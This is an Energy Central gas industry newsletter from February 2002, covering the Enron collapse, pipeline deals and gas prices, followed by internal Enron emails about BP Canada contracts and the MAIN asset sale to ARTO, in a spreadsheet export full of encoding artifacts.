[IMAGE]=09 [IMAGE] =09_x000D_
_x000D_
_x000D_
      HOME  | GAS NEWS  | EVENTS  | JOBS  | BUSINESS CENTERS  | DIRECTORIES=_x000D_
  | DATA CENTER    TUESDAY, FEBRUARY 5, 2002  =09_x000D_
_x000D_
_x000D_
 =09   THIS ISSUE BROUGHT TO YOU BY       Skyrocketing prices, reliability =_x000D_
worries and environmental concerns have increased current demand for distri=_x000D_
buted energy resource projects and services. The Guidebook of Funds and Inc=_x000D_
entives for Distributed Energy Resources from EFI, provides a comprehensive=_x000D_
 listing and description of more than 200 federal and state government prog=_x000D_
rams. Leverage them to reduce the cost and increase the value of your distr=_x000D_
ibuted energy resource projects. Each inclusive program detail includes bac=_x000D_
kground and purpose, description, contact information, and more, also in ta=_x000D_
bular format. See more info on this valuable resource at http://www.energyc=_x000D_
entral.com/links/show_mi.cfm?id=3D100416         TOP STORIES     Enbridge b=_x000D_
uys more U.S. gas pipelines for $178 mln  CALGARY, Alberta, Feb 4 (Reuters)=_x000D_
 Pipeline and utility firm Enbridge Inc. said on Monday it was buying north=_x000D_
eastern Texas natural gas gathering and processing assets from Sulphur Rive=_x000D_
r Gathering LP for $178 million, its latest in a string of acquisitions in =_x000D_
the southern United States.     Maritimes seeks expanded gas line to U.S. N=_x000D_
ortheast  NEW YORK, Feb 4 (Reuters) Maritimes &amp; Northeast Pipeline said Mon=_x000D_
day it has applied to the Federal Energy Regulatory Commission (FERC) to fu=_x000D_
rther expand its natural gas pipeline system to the U.S. Northeast.     Gaz=_x000D_
prom drops plans to build second gas pipeline to western Europe  Feb 04, 20=_x000D_
02 - Deutsche Presse-Agentur (dpa) Russian gas utility Gazprom has stopped =_x000D_
plans to build a new gas pipeline to western Europe through Poland, the Int=_x000D_
erfax news agency said Monday.      Press Release      npower Simplifies It=_x000D_
s Gas, Electricity and Telco Billing Process With SPL WorldGroup  Morristow=_x000D_
n, New Jersey - February 4th, 2002 SPL WorldGroup, the leading provider of =_x000D_
customer management solutions to the global energy industry, and npower, on=_x000D_
e of the UK's largest retail energy companies, has successfully implemented=_x000D_
 SPL's industry leading customer management application. Meeting an aggress=_x000D_
ive six-month timetable for implementation, npower is now able to provide i=_x000D_
ts new gas and electricity customers with a single bill for both energy pro=_x000D_
ducts.      Energy Security      Watchdog Warns of Tanker Attacks   By ROHA=_x000D_
N SULLIVAN Associated Press Writer, KUALA LUMPUR, Malaysia, Feb 04, 2002 (A=_x000D_
P Online via COMTEX) -- Ships carrying huge loads of highly flammable natur=_x000D_
al gas could be hijacked by terrorists and used in suicide attacks, a globa=_x000D_
l piracy watchdog warned Monday.          ADVERTISEMENT    Data on nuclear =_x000D_
power plant performance available now! Energy Central's Operating Plant Exp=_x000D_
erience Code (OPEC) allows you to analyze nuclear power plant performance, =_x000D_
identify trends of lost generation and causes of poor performance. Download=_x000D_
 your free trial version today at http://www.energycentral.com/sections/dat=_x000D_
abases/OPEC .         Enron Debacle      Senate panel plans to subpoena Enr=_x000D_
on's Lay  WASHINGTON, Feb 4 (Reuters) - The chairman of the powerful Senate=_x000D_
 Commerce Committee on Monday said he would force former Enron Corp. chairm=_x000D_
an Kenneth Lay to appear before his panel and called for a special prosecut=_x000D_
or to probe the failed energy giant's ties to the Bush administration.     =_x000D_
 Enron deception started at top-Enron director  WASHINGTON, Feb 4 (Reuters)=_x000D_
 - Enron Corp. tried to systematically manipulate its results and deceive s=_x000D_
hareholders as top executives raked in millions of dollars in personal gain=_x000D_
s, the author of an internal inquiry into the company's collapse told Congr=_x000D_
ess on Monday.      Enron chief financial officer to take the Fifth  WASHIN=_x000D_
GTON, Feb 3 (Reuters) Enron's former chief financial officer, who is charge=_x000D_
d with pocketing $30 million from questionable deals that led to the compan=_x000D_
y's collapse, will not answer questions in testimony before Congress, a law=_x000D_
maker investigating the firm said on Sunday.      Enron Europe liabilities =_x000D_
billions of dollars  LONDON, Feb 4 (Reuters) - Administrator Pricewaterhous=_x000D_
eCoopers said on Monday it had told creditors that collapsed energy company=_x000D_
 Enron Europe had "billions" of dollars of liabilities.      Congressmen qu=_x000D_
estion legality of some Enron transactions   By PETE YOST Associated Press =_x000D_
Writer, WASHINGTON, Feb 03, 2002 (AP WorldStream via COMTEX) -- Two members=_x000D_
 of Congress pointed to possible criminality in the Enron scandal Sunday, s=_x000D_
aying the company manufactured income out of its off-the-books partnership =_x000D_
deals that led to financial disaster.      Internal Enron Probe Finds Abuse=_x000D_
s   By KRISTEN HAYS Associated Press Writer, HOUSTON, Feb 04, 2002 (AP Onli=_x000D_
ne via COMTEX) -- Enron Corp. executives pocketed large amounts of money in=_x000D_
 running complex partnerships used to disguise the troubled energy company'=_x000D_
s financial problems while top managers and auditors provided little oversi=_x000D_
ght, an internal probe found.      ANALYSIS: Internal Report Suggests Why E=_x000D_
nron Executives Are So Quiet Now  By Jim Landers, The Dallas Morning News, =_x000D_
Feb. 4 After Enron Corp.'s own report on what went wrong, perhaps it's not =_x000D_
surprising that Kenneth Lay and several other ex-executives are electing to=_x000D_
 stay away or stay mum before Congress this week.      Enron Rode U.S. Poli=_x000D_
cy, Washington Ties to Lofty But Failed Overseas Ventures  By Jim Landers, =_x000D_
The Dallas Morning News, Feb. 2 In many ways, says Chamber of Commerce exec=_x000D_
utive Michael Clark, "the business of U.S. foreign policy in the 1990s was =_x000D_
business."      Enron Debacle Forces Sharper Focus on Company Audit Committ=_x000D_
ees  By Dan Feldstein, Houston Chronicle, Feb. 4 At the last meeting of the=_x000D_
 Reliant Energy board of directors' audit committee, the subject was Enron =_x000D_
Corp. and its highly creative accounting.      Interview Offers Glimpse at =_x000D_
Then-Enron Chairman's Influence  By Eric Berger, Houston Chronicle, Feb. 4 =_x000D_
An interview last May with Enron Corp.'s then-chairman Ken Lay has revealed=_x000D_
 more of his influence on the nation's energy policy.      Former Enron Cha=_x000D_
irman's Rise as Dramatic as His Fall  Houston Chronicle, Feb. 3 One day las=_x000D_
t August, Ken Lay faced more than 1,000 Enron employees in the grand ballro=_x000D_
om at the Hyatt Regency downtown.      Former Enron Workers Feel Let Down a=_x000D_
s Former Chairman Alters Plans  By Steve Brewer, Houston Chronicle, Feb. 4 =_x000D_
For former Enron employees in Houston, Ken Lay's televised testimony before=_x000D_
 Congress was going to be the equivalent of Sunday's Super Bowl.      Forme=_x000D_
r Enron Leader Lay Cancels Plans to Testify before Congress  By John C. Hen=_x000D_
ry, Houston Chronicle, Feb. 4 Questioning whether he could get a fair heari=_x000D_
ng before Congress, former Enron Corp. Chairman Ken Lay notified lawmakers =_x000D_
Sunday that he would not appear this week before committees examining the c=_x000D_
ompany's collapse.      Class-Action Suit against Enron May Include You  By=_x000D_
 Pamela R. Winnick, Pittsburgh Post-Gazette, Feb. 4 Did you lose your shirt=_x000D_
 investing in Enron stock?      Andersen to hire former Fed Volcker to rest=_x000D_
ore rep-ABC  WASHINGTON, Feb 3 (Reuters) Embattled auditor Andersen, critic=_x000D_
ized for its handling of fallen Enron Corp.'s books, plans to hire former F=_x000D_
ederal Reserve Chairman Paul Volcker to help the firm restore its credibili=_x000D_
ty, ABC News reported on Sunday, citing no sources.      Enron officials se=_x000D_
en facing criminal prosecution  WASHINGTON, Feb 3 (Reuters) - An internal E=_x000D_
nron Corp. report showing the company inflated profits while top employees =_x000D_
raked in millions of dollars they should not have received puts some Enron =_x000D_
executives in jeopardy of criminal prosecution, key members of the U.S. Con=_x000D_
gress said on Sunday.      FACTBOX-Congress hearings schedule on Enron/Ande=_x000D_
rsen  WASHINGTON, Feb 3 (Reuters) The following are the hearings that the U=_x000D_
.S. Congress has firmly scheduled on the collapse of Enron Corp., the role =_x000D_
of its auditor Andersen, and related regulatory issues over the coming week=_x000D_
s. Latest information added is marked with *.      AFL-CIO asks SEC bar Enr=_x000D_
on directors from boards  WASHINGTON, Feb 4 (Reuters) - The AFL-CIO called =_x000D_
on U.S. regulators on Monday to bar directors of Enron Corp. from serving o=_x000D_
n other companies' boards, arguing the directors were "substantially unfit"=_x000D_
 for such duties.      Ex-Enron CEO Skilling still plans to testify  WASHIN=_x000D_
GTON, Feb 4 (Reuters) One-time Enron Corp. Chief Executive Jeffrey Skilling=_x000D_
 still plans to testify before a congressional committee later this week, h=_x000D_
is spokeswoman said on Monday, unlike other former executives of the fallen=_x000D_
 energy giant.      Deep Roots of Enron Fall Studied   By BRAD FOSS AP Busi=_x000D_
ness Writer, HOUSTON, Feb 03, 2002 (AP Online via COMTEX) -- Enron's crash =_x000D_
now is being tracked back to deceptive accounting and unbridled deal-making=_x000D_
 that were part of the company's culture for years.      Enron Specter Haun=_x000D_
ts World Forum   By EILEEN ALT POWELL AP Business Writer, NEW YORK, Feb 03,=_x000D_
 2002 (AP Online via COMTEX) -- If there is a ghost haunting the World Econ=_x000D_
omic Forum, it belongs to Enron Corp.      Excerpts From Enron Investigatio=_x000D_
n   HOUSTON, Feb 03, 2002 (AP Online via COMTEX) -- Here are excerpts from =_x000D_
a 203-page internal probe into partnerships that helped fuel Enron Corp.'s =_x000D_
collapse last year:      British and U.S. unions call for accountants' body=_x000D_
 to investigate Wakeham  LONDON, Feb 04, 2002 (AP WorldStream via COMTEX) -=_x000D_
- The Institute of Chartered Accountants of England and Wales said on Monda=_x000D_
y it was awaiting information from U.S. authorities before deciding whether=_x000D_
 to investigate former government minister John Wakeham in connection with =_x000D_
his role as a director of Enron Corp.      No 10 did not reveal all Enron t=_x000D_
alks  Feb 04 - The Guardian The row over the web of influence built up by t=_x000D_
he collapsed energy giant Enron deepened yesterday as it emerged that Downi=_x000D_
ng Street failed to disclose a number of meetings the company held with min=_x000D_
isters and key advisers to Tony Blair and Gordon Brown.      Cooper Aims to=_x000D_
 Reform Enron Into Firm with Predictable Cash Flows  Feb. 4 (Utility Spotli=_x000D_
ght) In his first day as interim CEO of Enron, bankruptcy restructuring spe=_x000D_
cialist Stephen Cooper said he will focus on quickly returning the troubled=_x000D_
 firm into an energy company centered around international and domestic pow=_x000D_
er plants and natural gas facilities that will provide predictable revenues=_x000D_
 and cash flow. Special Offer from this Publisher!       Chair of Georgia G=_x000D_
OP Says He's Willing to Answer Enron Questions  By Jim Galloway, The Atlant=_x000D_
a Journal-Constitution, Feb. 2 During the eight months he's been their chai=_x000D_
rman, Georgia Republicans have found out that when you get Ralph Reed, you =_x000D_
get many things.      Enron Executives Reassured Employees, Investors as Fi=_x000D_
rm Spun Out of Control  By Charlene Oldham, The Dallas Morning News, Feb. 3=_x000D_
 With that very public reassurance, Kenneth Lay predicted blue skies on the=_x000D_
 day that protege Jeffrey Skilling unexpectedly stepped down after a six-mo=_x000D_
nth stint as Enron Corp.'s chief executive.      Jesse Jackson, Others Reit=_x000D_
erate Efforts to Get Relief for Ex-Enron Workers  By Mary Vuong, Houston Ch=_x000D_
ronicle, Feb. 4 The Rev. Jesse Jackson on Sunday reiterated his mission to =_x000D_
seek financial relief for former Enron employees during a Houston gathering=_x000D_
 before heading to Washington, D.C., with several of those workers to watch=_x000D_
 Ken Lay's scheduled testimony before Congress today.      Harris County, T=_x000D_
exas, District Attorney Says Staff Will Not Investigate Enron  By Alan Bern=_x000D_
stein, Houston Chronicle, Feb. 2 Harris County District Attorney Chuck Rose=_x000D_
nthal said Friday his staff is not investigating the possibility of crimina=_x000D_
l actions in the financial collapse of Enron Corp. because it has no eviden=_x000D_
ce state laws were broken.      Houston Congressman Bentsen Heads Roundtabl=_x000D_
e Session for Ex-Enron Workers  By Lori Rodriguez, Houston Chronicle, Feb. =_x000D_
4 On the eve of a congressional hearing today that was to feature former En=_x000D_
ron Chairman Ken Lay, Houston Congressman Ken Bentsen met with former compa=_x000D_
ny employees Sunday to hammer out questions for the ex-CEO about the collap=_x000D_
se of the company and the subsequent plight of its workforce.      GOP whip=_x000D_
 DeLay calls for Lay to testify   WASHINGTON, Feb 04, 2002 (United Press In=_x000D_
ternational via COMTEX) -- A key Republican lawmaker Monday joined the call=_x000D_
 for former Enron head Kenneth Lay to appear before congressional committee=_x000D_
s investigating the collapse of the Houston energy giant.      National Ene=_x000D_
rgy Policy      Bush budget slashes U.S. oil, natgas research funds  WASHIN=_x000D_
GTON, Feb 4 (Reuters) The U.S. Energy Department's oil and natural gas rese=_x000D_
arch programs were slashed under President George W. Bush's new fiscal 2003=_x000D_
 budget released on Monday, while renewable energy and efficiency programs =_x000D_
received a slight funding boost.      Enron Disclosures Weigh on Bush   WAS=_x000D_
HINGTON, Feb 03, 2002 (AP Online via COMTEX) -- A Republican committee chai=_x000D_
rman said Sunday the Bush administration probably will end up revealing inf=_x000D_
ormation about its energy meetings, amid reports of more contacts with Enro=_x000D_
n and other power companies.      Debate continues over disclosure of Bush =_x000D_
White House energy meetings   WASHINGTON, Feb 03, 2002 (AP WorldStream via =_x000D_
COMTEX) -- A Republican committee chairman says the Bush administration pro=_x000D_
bably will end up revealing information about its energy meetings, amid rep=_x000D_
orts of more contacts with Enron and other power companies.      Competitio=_x000D_
n &amp; Deregulation    For reports and related information on this topic visit=_x000D_
 our Data Center   [IMAGE]    CEO of Georgia Gas Utility Criticizes Electri=_x000D_
c Company's Moves  By Matthew C. Quinn, The Atlanta Journal-Constitution, F=_x000D_
eb. 2 The debate over natural gas deregulation turned into a boardroom braw=_x000D_
l Friday when the top executive of Georgia's No. 1 gas company warned the s=_x000D_
tate's top electric company to butt out of its business.      Mergers, Acqu=_x000D_
isitions &amp; Divestitures      AEP hires advisers for UK, Australia sales  CO=_x000D_
LUMBUS, Ohio, Feb 4 (Reuters) - American Electric Power Co. Inc. on Monday =_x000D_
said it has retained Schroder Salomon Smith Barney and ABN Amro to advise i=_x000D_
t on prospects for the divestment of Seeboard, its electric and gas utility=_x000D_
 in southeast England.      NW Natural Positive on PGE Purchase; Others See=_x000D_
 Debt, Rate Issues  Feb. 4 (Clearing Up) NW Natural remains confident that =_x000D_
its proposed purchase of Portland General from Enron will go through. Speci=_x000D_
al Offer from this Publisher!       Legislation/Regulation      US FERC wan=_x000D_
ts $8 mln budget hike to $200 mln for FY03  WASHINGTON, Feb 4 (Reuters) Ref=_x000D_
lecting a bigger emphasis on market enforcement, the Federal Energy Regulat=_x000D_
ory Commission (FERC) requested a budget of nearly $200 million for fiscal =_x000D_
2003, up about $8 million from this year.      Gas Pricing/Hubs      Canadi=_x000D_
an spot gas mostly eases with weaker NYMEX  NEW YORK, Feb 4 (Reuters) Canad=_x000D_
ian spot natural gas prices mostly eased Monday with weaker gas futures as =_x000D_
forecasters called for near seasonal weather this week for much of the U.S.=_x000D_
 and in ongoing concerns over a glut of gas in storage, industry sources sa=_x000D_
id.      NYMEX Hub gas ends mixed, losses limited by weather  NEW YORK, Feb=_x000D_
 4 (Reuters) NYMEX Hub gas ended mixed Monday in moderate trade, with conce=_x000D_
rns about record levels of gas in storage weighing on front months but loss=_x000D_
es limited by mostly seasonal U.S. weather forecasts this week, sources sai=_x000D_
d.      Natural Gas Cash Softens in West, Northeast Jumps on Weather  Feb. =_x000D_
4 (Btu's Daily Gas Wire) The natural gas spot market was mixed throughout t=_x000D_
he U.S. and Canada, according to trader reports. Special Offer from this Pu=_x000D_
blisher!       U.S. spot gas mixed, Northeast up sharply on cold  SAN FRANC=_x000D_
ISCO, Feb 4 (Reuters) U.S. day-ahead natural gas prices in the Northeast so=_x000D_
ared Monday on expectations for colder weather through the week, though pri=_x000D_
ces at most other pipelines traded mixed, market sources said.      Drillin=_x000D_
g/Exploration      Rockies competing with gulf for gas production cos.  Feb=_x000D_
 04 - New Orleans CityBusiness SEVERAL LARGE OIL companies making acquisiti=_x000D_
ons in 2001 had their eye not on boosting Gulf of Mexico reserves, but on e=_x000D_
xploiting coalbed methane gas production in the Rocky Mountains.      Pipel=_x000D_
ines      Pipeline opponents huddle on a strategy  Feb 04 - Westchester Cou=_x000D_
nty Business Journal With Washington all but signing off on the $700 millio=_x000D_
n Millennium Pipeline, the next few months will bring two hurdles that the =_x000D_
natural gas conduit must surmount if it is ever to be built.      Study: Fe=_x000D_
w Benefits in Gasline Deal  Feb 03 - Associated Press Alaska has few incent=_x000D_
ives to own a stake in a natural gas pipeline from the North Slope to the L=_x000D_
ower 48 states, according to a Department of Revenue report, although it st=_x000D_
opped short of warning against such an investment.      Rates    For more i=_x000D_
nformation on rate tariffs visit Gas Rate Tariffs   [IMAGE]    Georgia Natu=_x000D_
ral-Gas Customers See Prices Fall in Warm Winter  By Matthew C. Quinn, The =_x000D_
Atlanta Journal-Constitution, Feb. 2 Top Georgia natural gas marketers drop=_x000D_
ped residential prices as much as 7.5 percent Friday as warm weather keeps =_x000D_
prices down.      Fuel Company Lowers Gas Prices Another 2 Percent in Buffa=_x000D_
lo, N.Y., Area  By David Robinson, The Buffalo News, N.Y., Feb. 3 It keeps =_x000D_
getting cheaper when your furnace kicks on.      Storage      SGR holds bid=_x000D_
ding for Mississippi natgas storage  HOUSTON, Feb 4 (Reuters) Privately hel=_x000D_
d SGR Holdings on Monday said its subsidiary is holding a month-long "open =_x000D_
season" to determine market interest for natural gas storage service at its=_x000D_
 facility in Mississippi.      General      State puts royalty gas up for b=_x000D_
id  Feb 04 - Journal of Alaska Business and Commerce Alaska is soliciting b=_x000D_
ids for 400 million cubic feet per day, or roughly 80 percent of its royalt=_x000D_
y gas, from the estimated 35 trillion cubic feet of gas on the North Slope.=_x000D_
      Joint Ventures &amp; Alliances      Dynegy and the Bahrain National Gas C=_x000D_
ompany to Form International Natural Gas Liquids Partnership  HOUSTON &amp; BAH=_x000D_
RAIN--(BUSINESS WIRE)--Feb. 4, 2002 Dynegy Global Liquids, Inc., a subsidia=_x000D_
ry of Fortune 100 company Dynegy Inc., and the Bahrain National Gas Company=_x000D_
 (BANAGAS) today announced they have entered into a joint venture to pursue=_x000D_
 natural gas liquids-related opportunities throughout the Middle East and N=_x000D_
orth Africa.      Trading/Marketing      CFTC member raises concerns over E=_x000D_
nron trading  WASHINGTON, Feb 4 (Reuters) A member of the Commodity Futures=_x000D_
 Trading Commission warned U.S. lawmakers that there are "gaping holes" in =_x000D_
regulating the kind of trading carried out by Enron Corp. and said it was p=_x000D_
remature to conclude that the company did not manipulate energy markets.   =_x000D_
   New Technologies/Markets      Emerging Technology Companies Showcased at=_x000D_
 Energy Venture Fair  by Jon T. Brock, IssueAlert, Feb. 1 (Scientech) Seven=_x000D_
ty-five emerging technology companies in the energy industry converged on H=_x000D_
ouston, Texas earlier this week in what could be called a "dating service" =_x000D_
for those seeking to raise capital in a tight market. Special Offer from th=_x000D_
is Publisher!       Deals/Contracts      Qatar signs gas agreement with Kuw=_x000D_
ait   By Mena Report Reporters, February 4, 2002 (Al-Bawaba via COMTEX) -- =_x000D_
The Qatari Minister of Energy and Industry, Abdullah Al-Attiya, and the Kuw=_x000D_
aiti Minister of Oil, Adel Subeih, recently signed a bilateral agreement fo=_x000D_
r Qatar to supply Kuwait with gas over the next 25 years, reported Al-Hayat=_x000D_
 .      Legal      Enron scandal highlights debate over lawyers' duty to re=_x000D_
port client wrongdoing  By ANNE GEARAN Associated Press Writer, PHILADELPHI=_x000D_
A, Feb 03, 2002 (AP WorldStream via COMTEX) -- Lawyers may be among the los=_x000D_
ers in the Enron scandal if it turns out they turned a blind eye to account=_x000D_
ing flimflams or worse at the failed energy trading company.      Labor/Hum=_x000D_
an Resources      Lattice confirms plan to cut jobs to meet new price contr=_x000D_
ols  Feb 04 - AFX Lattice Group PLC, which owns UK's Transco gas pipeline b=_x000D_
usiness, has confirmed it is to reduce its workforce to comply with the new=_x000D_
 price controls set by regulators.      Financial      Williams Cos. beefs =_x000D_
up asset sales but shares fall  HOUSTON, Feb 4 (Reuters) - Williams Cos. In=_x000D_
c. said on Monday it plans to step up asset sales and might issue new share=_x000D_
s to strengthen its balance sheet and retain investment grade credit rating=_x000D_
s amid concerns it may have to assume debts of $2.2 billion from former sub=_x000D_
sidiary Williams Communications.      Troubles at Williams Highlight Ongoin=_x000D_
g Meltdown of Telecom Sector  by Will McNamara, IssueAlert, Feb. 4 (Sciente=_x000D_
ch) Energy conglomerate Williams Cos. and its telecommunications spin-off, =_x000D_
Williams Communications Group, face mounting shareholder lawsuits alleging =_x000D_
the communications venture was fraught with misstated financial results and=_x000D_
 debt. Special Offer from this Publisher!       Williams Communications to =_x000D_
submit balance sheet plan to banks by Feb 25   TULSA, OK, Feb 04, 2002 (AFX=_x000D_
-Asia via COMTEX) -- Williams Communications, a unit of energy marketing, t=_x000D_
rading and exploration company Williams Cos Inc, said it will submit a comp=_x000D_
rehensive restructuring plan to banks by Feb 25 and that it is not in defau=_x000D_
lt under the credit agreement or any other material agreement.      US comp=_x000D_
anies struggle to ease accounting fears  By Julie MacIntosh, NEW YORK, Feb =_x000D_
3 (Reuters) The fallout triggered by the Enron Corp. scandal has taken on a=_x000D_
 life of its own, fueled by investor anxiety, and is now reaching into the =_x000D_
nooks and crannies of major boardrooms across Corporate America.      Inter=_x000D_
national      China Boosts Natural Gas Industry   BEIJING, February 4, 2002=_x000D_
 (Xinhua via COMTEX) -- China is making full use of its rich natural gas re=_x000D_
sources.      Partners inaugurate natgas expansion, pipeline works   Bolivi=_x000D_
a, Feb 04, 2002 (BNamericas.com via COMTEX) -- A partnership of Spain's Rep=_x000D_
sol-YPF, Brazil's federal energy company Petrobras and France's TotalFinaEl=_x000D_
f will begin the second-stage expansion of a natural gas processing unit in=_x000D_
 Bolivia's San Alberto field on Wednesday (Feb.6) in Tarija department's Ca=_x000D_
rapari municipality, Petrobras said in a statement.      Petrobras to tripl=_x000D_
e natural gas imports from Bolivia by 2004   Rio de Janeiro, Feb 05, 2002 (=_x000D_
EFE via COMTEX) -- State-owned oil giant Petrobras plans to up its imports =_x000D_
of Bolivian natural gas from the current 10 million cubic meters (350 milli=_x000D_
on cubic feet) a day to nearly 30 million cubic meters (1.1 billion cubic f=_x000D_
eet) a day by 2004, a company spokesman told the newspaper O Globo.      Tr=_x000D_
ansgas to get under control of RWE Gas  Feb 04 - Access Czech Republic Busi=_x000D_
ness Bulletin Transgas (Prague, Czech Republic), natural gas importing comp=_x000D_
any, will get under control of RWE Gas (Germany) shortly.        If you are=_x000D_
 an Energy Central News Subscriber and you have checked any news articles a=_x000D_
bove, selecting the 'Get Articles' button below will deliver all of the che=_x000D_
cked articles in one page. This is a convenient way to get exactly the news=_x000D_
 you need - quickly!           NEED INFORMATION ON THE POWER INDUSTRY? ENER=_x000D_
GY CENTRAL'S GOT IT!    JOB CENTER  The Job Center provides instant access =_x000D_
to the best employment opportunities and prospective employees in the energ=_x000D_
y industry through comprehensive job listings and active resume database.  =_x000D_
JOB WATCH  A free weekly e-mail service that broadcasts new job listings in=_x000D_
 the Job Center directly to your inbox!   CONFERENCE WATCH  The Conference =_x000D_
Watch is a weekly e-mail service and online database that lists upcoming in=_x000D_
dustry conferences, seminars, and trade shows. The service is free to all e=_x000D_
nergy professionals.   DATA CENTER  Energy Central partners with the best r=_x000D_
esearch, publishing, and consulting firms to create useful online database =_x000D_
applications. Visit the Data Center to gain immediate access to online data=_x000D_
bases and instant reports.   DIRECTIONS AND INFORMATION   ABOUT ENERGY CENT=_x000D_
RAL'S GAS NEWS SERVICE This news summary service is provided FREE to qualif=_x000D_
ied professionals in the power industry. This news summary may be redistrib=_x000D_
uted provided it is kept in its entirety.   * Visit Member Services  to STA=_x000D_
RT, STOP, or CHANGE FORMAT for all of your e-mail subscriptions.  * To BEGI=_x000D_
N receiving this summary directly, send a message with a subject of 'signup=_x000D_
' to gasservice@energycentral.com .   * To STOP receiving this service, sen=_x000D_
d a message to gasservice@energycentral.com  or call Member Services at 303=_x000D_
-782-5510.   PRESS RELEASES Submit press releases and other news to pr@ener=_x000D_
gycentral.com    SPONSORSHIP AND ADVERTISING For sponsorship or advertising=_x000D_
 info call sales at 303-782-5510   TO DELIVER YOUR ARTICLES, PAPERS, PROCEE=_x000D_
DINGS OR MONOGRAPHS THROUGH ENERGY CENTRAL: Energy Central provides a varie=_x000D_
ty of mechanisms for delivery of information to power professionals includi=_x000D_
ng this news product, Energy Central Web Site (http://www.energycentral.com=_x000D_
 ), Energy Central Conference Watch(tm), and others. We can deliver your in=_x000D_
formation on a promotional, subscription or a pay-per-view basis. For more =_x000D_
information, contact Steve Drazga at 303-782-5510 sdrazga@energycentral.com=_x000D_
 )    =09 =09      CORPORATE SPONSORS  [IMAGE]  Click on each logo to visit=_x000D_
 sponsor.  [IMAGE]    Allegro Development  [IMAGE] RER  [IMAGE] Itron  [IMA=_x000D_
GE] Energy Solutions Plus, Inc.  [IMAGE]       NEWS SECTIONS       Top Stor=_x000D_
ies      Press Release      Energy Security      Enron Debacle      Nationa=_x000D_
l Energy Policy      Competition &amp; Deregulation      Mergers, Acquisitions =_x000D_
&amp; Divestitures      Legislation/Regulation      Gas Pricing/Hubs      Drill=_x000D_
ing/Exploration      Pipelines      Rates      Storage      General      Jo=_x000D_
int Ventures &amp; Alliances      Trading/Marketing      New Technologies/Marke=_x000D_
ts      Deals/Contracts      Legal      Labor/Human Resources      Financia=_x000D_
l      International          ADVERTISEMENT   EC Professional           NEW=_x000D_
S SEARCH     Find Energy Central Gas News stories up to 30 days old.       =_x000D_
     ENERGY CENTRAL     Home  News Centers      Energy Central Direct  New!=_x000D_
     Power News      Gas News      Weekly News Wrap-Up  New! Events Center =_x000D_
 Job Center  Data Center  Business Centers  On-line Publications  New! Rese=_x000D_
arch Report Center  New! Directories      Associations      State PUCs     =_x000D_
 Trade Publications  Industry      Glossary      Links  Member Services  Ab=_x000D_
out Energy Central      Our Products      Content Syndication  New!     [IM=_x000D_
AGE] =09_x000D_
_x000D_
[IMAGE]_x000D_
      HOME  | GAS NEWS  | EVENTS  | JOBS  | BUSINESS CENTERS  | DIRECTORIES=_x000D_
  | DATA CENTER   =09_x000D_
_x000D_
_x000D_
 =09  Copyright ? CyberTech, Inc.  1996-2002. All rights reserved.  Energy =_x000D_
Central(r) is a registered trademark of CyberTech, Incorporated.  CyberTech=_x000D_
 does not warrant that the information or services of Energy Central will m=_x000D_
eet any specific requirements; nor will it be error free or uninterrupted; =_x000D_
nor shall CyberTech be liable for any indirect, incidental or consequential=_x000D_
 damages (including lost data, information or profits) sustained or incurre=_x000D_
d in connection with the use of, operation of, or inability to use Energy C=_x000D_
entral. Contact: 303-782-5510 or service@energycentral.com .    =09 =09_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Oct 2001 07:22:47 -0800 (PST)</t>
  </si>
  <si>
    <t>Can you take a look at all the Canadian Agreements listed on this list provided to us by BP and verify whether these agreements exist in Canada?_x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Crawford, Sharon  _x000D_
Sent:	Monday, October 29, 2001 6:12 PM_x000D_
To:	Jones, Tana_x000D_
Subject:	RE: _x000D_
_x000D_
Tana, the Master Firm Gas P/S Agreement which I forwarded to you earlier is the 3rd last agreement on their list [so I'm not sure what #1 on their list is].  I'm not sure what the 2nd and 3rd agreements on their list are either._x000D_
_x000D_
We do, however, have an Interruptible Agreement dated May 26/94 [not on their list] and a Firm (&lt;31 Day) Gas P/S Agreement dated August 1/94 [which is, I think, #5 on their list] with Amoco Canada Petroleum Company Ltd. (now BP Canada Energy Company).  Do you want copies of these agreements?_x000D_
_x000D_
I don't know what the other agreements are._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Jones, Tana  _x000D_
Sent:	Monday, October 29, 2001 3:25 PM_x000D_
To:	Crawford, Sharon_x000D_
Cc:	Keohane, Peter_x000D_
Subject:	_x000D_
_x000D_
 &lt;&lt; File: BP Canada Enron contract list.doc &gt;&gt; _x000D_
_x000D_
Sharon,_x000D_
_x000D_
BP prepared a list of all the agreements they thought we had in place.  You might want to do a quick check and make sure that you are not missing any Canadian contracts they might have listed on this list._x000D_
_x000D_
THANKS FOR YOUR QUICK RESPONSE!</t>
  </si>
  <si>
    <t>Tue, 30 Oct 2001 13:26:08 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kerry.stroup@enron.com', 'l..nicolay@enron.com'})</t>
  </si>
  <si>
    <t>RE: Alliance Bridgeco acquisition of MAIN assets</t>
  </si>
  <si>
    <t>I don't know if we need to do anything.  Seems like they are just acquiring=_x000D_
 the MAIN facilities, not market design material.  Have you spoken to anyon=_x000D_
e at ARTO to inquire?_x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Stroup, Kerry =20_x000D_
Sent:=09Tuesday, October 30, 2001 9:01 AM_x000D_
To:=09Steffes, James D.; Nicolay, Christi L._x000D_
Cc:=09Roan, Michael; Migden, Janine_x000D_
Subject:=09Alliance Bridgeco acquisition of MAIN assets_x000D_
_x000D_
Jim and Christi,_x000D_
_x000D_
The attached document is a contract, approved by ARTO's members, covering t=_x000D_
he sale of MAIN's facilities and transfer of assets to ARTO.  The document =_x000D_
raises the question of whether the Alliance is violating FERC's July 12 ord=_x000D_
er by making "business decisions" that should be made by an independent boa=_x000D_
rd. You'll recall the language in the July 12 Order -- "We further direct t=_x000D_
hat from the date of this order an independent board be established to make=_x000D_
 all business decisions for the RTO."  The footnote following that statemen=_x000D_
t references the Grid Florida order, in which the Commission stated: Leasin=_x000D_
g office space, establishing employee benefit plans, putting accounting sys=_x000D_
tems into place and other basic intrastructure tasks....clearly do not pose=_x000D_
 independence concerns.  Regarding the acquisition of transmission faciliti=_x000D_
es...., any agreements for such acquisitions that are entered into before t=_x000D_
he independent Board is selected will be carefully scrutinized."  Thereafte=_x000D_
r the Commission identified several "more problematic' steps necessary for =_x000D_
implementing market design, including the acquisition of software and other=_x000D_
 systems implementing market design as significant to the future operatioin=_x000D_
 of the RTO, and required that any acquisition of software or other systems=_x000D_
